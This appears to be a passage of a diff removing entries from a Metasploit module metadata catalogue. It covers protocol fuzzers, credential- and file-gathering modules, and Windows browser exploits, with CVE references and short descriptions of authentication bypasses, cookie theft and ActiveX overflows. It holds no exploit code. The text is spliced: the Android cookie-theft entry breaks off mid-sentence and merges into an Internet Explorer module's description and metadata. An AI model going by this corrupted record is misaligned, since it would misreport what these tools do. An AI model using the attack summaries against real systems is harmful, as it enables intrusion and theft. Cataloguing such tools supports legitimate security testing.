06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb", - "is_install_path": true, - "ref_name": "fuzzers/http/http_get_uri_long", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/http/http_get_uri_strings": { - "name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)", - "fullname": "auxiliary/fuzzers/http/http_get_uri_strings", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullthreat" - ], - "description": "This module sends a series of HTTP GET request with malicious URIs.", - "references": [], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb", - "is_install_path": true, - "ref_name": "fuzzers/http/http_get_uri_strings", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": { - "name": "NTP Protocol Fuzzer", - "fullname": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Jon Hart " - ], - "description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n This findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out 
interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs", - "references": [], - "platform": "", - "arch": "", - "rport": 123, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2021-04-06 14:45:11 +0000", - "path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb", - "is_install_path": true, - "ref_name": "fuzzers/ntp/ntp_protocol_fuzzer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb2_negotiate_corrupt": { - "name": "SMB Negotiate SMB2 Dialect Corruption", - "fullname": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB negotiate requests that advertise a\n SMB2 dialect with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb2_negotiate_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_create_pipe": { - "name": "SMB Create Pipe Request Fuzzer", - "fullname": "auxiliary/fuzzers/smb/smb_create_pipe", - "aliases": [], 
- "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB create pipe\n requests using malicious strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_create_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_create_pipe_corrupt": { - "name": "SMB Create Pipe Request Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB create pipe requests with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_create_pipe_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_negotiate_corrupt": { - "name": "SMB Negotiate Dialect Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_negotiate_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB negotiate requests with corrupted 
bytes", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-08-24 21:38:44 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_negotiate_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": { - "name": "SMB NTLMv1 Login Request Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-07 20:22:56 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_tree_connect": { - "name": "SMB Tree Connect Request Fuzzer", - "fullname": "auxiliary/fuzzers/smb/smb_tree_connect", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB tree connect\n requests using malicious strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - 
"mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_tree_connect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smb/smb_tree_connect_corrupt": { - "name": "SMB Tree Connect Request Corruption", - "fullname": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SMB tree connect requests with corrupted bytes.", - "references": [], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": null, - "mod_time": "2020-05-13 16:34:47 +0000", - "path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/smb/smb_tree_connect_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/smtp/smtp_fuzzer": { - "name": "SMTP Simple Fuzzer", - "fullname": "auxiliary/fuzzers/smtp/smtp_fuzzer", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "justme" - ], - "description": "SMTP Simple Fuzzer", - "references": [ - "URL-http://www.ietf.org/rfc/rfc2821.txt" - ], - "platform": "", - "arch": "", - "rport": 25, - "autofilter_ports": [ - 25, - 465, - 587, - 2525, - 25025, - 25000 - ], - "autofilter_services": [ - "smtp", - "smtps" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb", - "is_install_path": true, - "ref_name": "fuzzers/smtp/smtp_fuzzer", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": { - "name": "SSH Key Exchange Init Corruption", - "fullname": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_kexinit_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_version_15": { - "name": "SSH 1.5 Version Fuzzer", - "fullname": "auxiliary/fuzzers/ssh/ssh_version_15", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with malicious version strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_version_15", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_version_2": { - "name": "SSH 2.0 Version Fuzzer", - "fullname": "auxiliary/fuzzers/ssh/ssh_version_2", - "aliases": [], - "rank": 300, - "disclosure_date": 
null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with malicious version strings.", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_version_2", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/ssh/ssh_version_corrupt": { - "name": "SSH Version Corruption", - "fullname": "auxiliary/fuzzers/ssh/ssh_version_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of SSH requests with a corrupted version string", - "references": [], - "platform": "", - "arch": "", - "rport": 22, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/ssh/ssh_version_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/tds/tds_login_corrupt": { - "name": "TDS Protocol Login Request Corruption Fuzzer", - "fullname": "auxiliary/fuzzers/tds/tds_login_corrupt", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of malformed TDS login requests.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - 
"ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb", - "is_install_path": true, - "ref_name": "fuzzers/tds/tds_login_corrupt", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_fuzzers/tds/tds_login_username": { - "name": "TDS Protocol Login Request Username Fuzzer", - "fullname": "auxiliary/fuzzers/tds/tds_login_username", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "hdm " - ], - "description": "This module sends a series of malformed TDS login requests.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb", - "is_install_path": true, - "ref_name": "fuzzers/tds/tds_login_username", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/acronis_cyber_protect_machine_info_disclosure": { - "name": "Acronis Cyber Protect/Backup machine info disclosure", - "fullname": "auxiliary/gather/acronis_cyber_protect_machine_info_disclosure", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "h00die-gr3y ", - "Sandro Tolksdorf of usd AG." - ], - "description": "Acronis Cyber Protect or Backup is an enterprise backup/recovery solution for all,\n compute, storage and application resources. 
Businesses and Service Providers are using it\n to protect and backup all IT assets in their IT environment.\n This module exploits an authentication bypass vulnerability at the Acronis Cyber Protect\n appliance which, in its default configuration, allows the anonymous registration of new\n backup/protection agents on new endpoints. This API endpoint also generates bearer tokens\n which the agent then uses to authenticate to the appliance.\n As the management web console is running on the same port as the API for the agents, this\n bearer token is also valid for any actions on the web console. This allows an attacker\n with network access to the appliance to start the registration of a new agent, retrieve\n a bearer token that provides admin access to the available functions in the web console.\n\n This module will gather all machine info (endpoints) configured and managed by the appliance.\n This information can be used in a subsequent attack that exploits this vulnerability to\n execute arbitrary commands on both the managed endpoint and the appliance.\n This exploit is covered in another module `exploit/multi/acronis_cyber_protect_unauth_rce_cve_2022_3405`.\n\n Acronis Cyber Protect 15 (Windows, Linux) before build 29486 and\n Acronis Cyber Backup 12.5 (Windows, Linux) before build 16545 are vulnerable.", - "references": [ - "CVE-2022-30995", - "CVE-2022-3405", - "URL-https://herolab.usd.de/security-advisories/usd-2022-0008/", - "URL-https://attackerkb.com/topics/27RudJXbN4/cve-2022-30995" - ], - "platform": "", - "arch": "", - "rport": 9877, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-11-26 16:10:14 +0000", - "path": "/modules/auxiliary/gather/acronis_cyber_protect_machine_info_disclosure.rb", - "is_install_path": true, - "ref_name": "gather/acronis_cyber_protect_machine_info_disclosure", - "check": true, - "post_auth": 
false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/adobe_coldfusion_fileread_cve_2023_26360": { - "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", - "fullname": "auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sf " - ], - "description": "This module exploits a remote unauthenticated deserialization of untrusted data vulnerability in Adobe\n ColdFusion 2021 Update 5 and earlier as well as ColdFusion 2018 Update 15 and earlier, in order to read\n an arbitrary file from the server.\n\n To run this module you must provide a valid ColdFusion Component (CFC) endpoint via the CFC_ENDPOINT option,\n and a valid remote method name from that endpoint via the CFC_METHOD option. By default an endpoint in the\n ColdFusion Administrator (CFIDE) is provided. 
If the CFIDE is not accessible you will need to choose a\n different CFC endpoint, method and parameters.", - "references": [ - "CVE-2023-26360", - "URL-https://attackerkb.com/topics/F36ClHTTIQ/cve-2023-26360/rapid7-analysis" - ], - "platform": "", - "arch": "", - "rport": 8500, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/gather/adobe_coldfusion_fileread_cve_2023_26360.rb", - "is_install_path": true, - "ref_name": "gather/adobe_coldfusion_fileread_cve_2023_26360", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/advantech_webaccess_creds": { - "name": "Advantech WebAccess 8.1 Post Authentication Credential Collector", - "fullname": "auxiliary/gather/advantech_webaccess_creds", - "aliases": [], - "rank": 300, - "disclosure_date": "2017-01-21", - "type": "auxiliary", - "author": [ - "h00die", - "sinn3r " - ], - "description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.", - "references": [ - "CVE-2016-5810", - "URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb", - 
"is_install_path": true, - "ref_name": "gather/advantech_webaccess_creds", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/alienvault_iso27001_sqli": { - "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", - "fullname": "auxiliary/gather/alienvault_iso27001_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-30", - "type": "auxiliary", - "author": [ - "Brandon Perry " - ], - "description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.", - "references": [ - "EDB-32644" - ], - "platform": "Linux", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb", - "is_install_path": true, - "ref_name": "gather/alienvault_iso27001_sqli", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/alienvault_newpolicyform_sqli": { - "name": "AlienVault Authenticated SQL Injection Arbitrary File Read", - "fullname": "auxiliary/gather/alienvault_newpolicyform_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-09", - "type": "auxiliary", - "author": [ - "Chris Hebert " - ], - "description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. 
This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.", - "references": [ - "CVE-2014-5383", - "OSVDB-106815", - "EDB-33317", - "URL-http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower" - ], - "platform": "", - "arch": "", - "rport": 443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb", - "is_install_path": true, - "ref_name": "gather/alienvault_newpolicyform_sqli", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_gather/android_browser_file_theft": { - "name": "Android Browser File Theft", - "fullname": "auxiliary/gather/android_browser_file_theft", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rafay Baloch", - "joev " - ], - "description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.", - "references": [ - "URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0", - "URL-https://bugs.chromium.org/p/chromium/issues/detail?id=90222" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/gather/android_browser_file_theft.rb", - "is_install_path": true, - "ref_name": "gather/android_browser_file_theft", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - 
"needs_cleanup": false, - "actions": [ - { - "name": "WebServer", - "description": "Serve exploit via web server" - } - ] - }, - "auxiliary_gather/android_browser_new_tab_cookie_theft": { - "name": "Android Browser \"Open in New Tab\" Cookie Theft", - "fullname": "auxiliary/gather/android_browser_new_tab_cookie_theft", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Rafay Baloch", - "joev " - ], - "description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a .\n\n IE Tabs, WScript and subsequent Powershell prompts all run as x86 even when run from\n an x64 iexplore.exe.\n\n By default, this module will not attempt to fire against IEs that come with Protected\n Mode enabled by default, because it can trigger a security prompt. 
However, if you are\n feeling brave, you can choose to ignore this restriction by setting the ALLOWPROMPT\n datastore option to true.", - "references": [ - "URL-http://support.microsoft.com/kb/182569", - "URL-http://blog.invisibledenizen.org/2009/01/ieunsafescripting-metasploit-module.html", - "URL-http://support.microsoft.com/kb/870669" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86/x64" - ], - "mod_time": "2021-01-13 11:06:01 +0000", - "path": "/modules/exploits/windows/browser/ie_unsafe_scripting.rb", - "is_install_path": true, - "ref_name": "windows/browser/ie_unsafe_scripting", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/imgeviewer_tifmergemultifiles": { - "name": "Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control", - "fullname": "exploit/windows/browser/imgeviewer_tifmergemultifiles", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-03-03", - "type": "exploit", - "author": [ - "Dr_IDE", - "TecR0c ", - "mr_me " - ], - "description": "This module exploits a stack based buffer overflow in the Active control file\n ImageViewer2.OCX by passing an overly long argument to an insecure TifMergeMultiFiles()\n method. 
Exploitation results in code execution with the privileges of the user who\n browsed to the exploit page.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", - "references": [ - "CVE-2010-5193", - "OSVDB-78102", - "EDB-15668", - "URL-http://web.archive.org/web/20101204093821/http://secunia.com:80/advisories/42445", - "URL-http://xforce.iss.net/xforce/xfdb/63666" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6/7", - "Internet Explorer 8 with JRE" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb", - "is_install_path": true, - "ref_name": "windows/browser/imgeviewer_tifmergemultifiles", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/indusoft_issymbol_internationalseparator": { - "name": "InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow", - "fullname": "exploit/windows/browser/indusoft_issymbol_internationalseparator", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-04-28", - "type": "exploit", - "author": [ - "Alexander Gavrun", - "Dmitriy Pletnev", - "James Fitts ", - "juan vazquez " - ], - "description": "This module exploits a heap overflow found in InduSoft Web Studio <= 61.6.00.00\n SP6. 
The overflow exists in the ISSymbol.ocx, and can be triggered with a long\n string argument for the InternationalSeparator() method of the ISSymbol control.\n This module uses the msvcr71.dll form the Java JRE6 to bypass ASLR.", - "references": [ - "CVE-2011-0340", - "OSVDB-72865", - "BID-47596", - "ZDI-12-168", - "URL-http://web.archive.org/web/20110506063846/http://secunia.com:80/secunia_research/2011-37" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb", - "is_install_path": true, - "ref_name": "windows/browser/indusoft_issymbol_internationalseparator", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/inotes_dwa85w_bof": { - "name": "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/inotes_dwa85w_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-01", - "type": "exploit", - "author": [ - "Gaurav Baruah", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow vulnerability on the UploadControl\n ActiveX. The vulnerability exists in the handling of the \"Attachment_Times\"\n property, due to the insecure usage of the _swscanf. 
The affected ActiveX is\n provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer.\n\n This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,\n using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3.\n\n In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one\n is installed with the iNotes ActiveX.", - "references": [ - "CVE-2012-2175", - "OSVDB-82755", - "BID-53879", - "ZDI-12-132", - "URL-http://www-304.ibm.com/support/docview.wss?uid=swg21596862" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 8 on Windows XP SP3", - "IE 7 on Windows Vista", - "IE 8 on Windows Vista", - "IE 8 on Windows 7", - "IE 9 on Windows 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/inotes_dwa85w_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/inotes_dwa85w_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/intrust_annotatex_add": { - "name": "Quest InTrust Annotation Objects Uninitialized Pointer", - "fullname": "exploit/windows/browser/intrust_annotatex_add", - "aliases": [], - "rank": 200, - "disclosure_date": "2012-03-28", - "type": "exploit", - "author": [ - "rgod ", - "mr_me " - ], - "description": "This module exploits an uninitialized variable vulnerability in the\n Annotation Objects ActiveX component. The ActiveX component loads into memory without\n opting into ALSR so this module exploits the vulnerability against windows Vista and\n Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX\n points to part of the ROP chain in a heap chunk and the calculated call will hit the\n pivot in a separate heap chunk. 
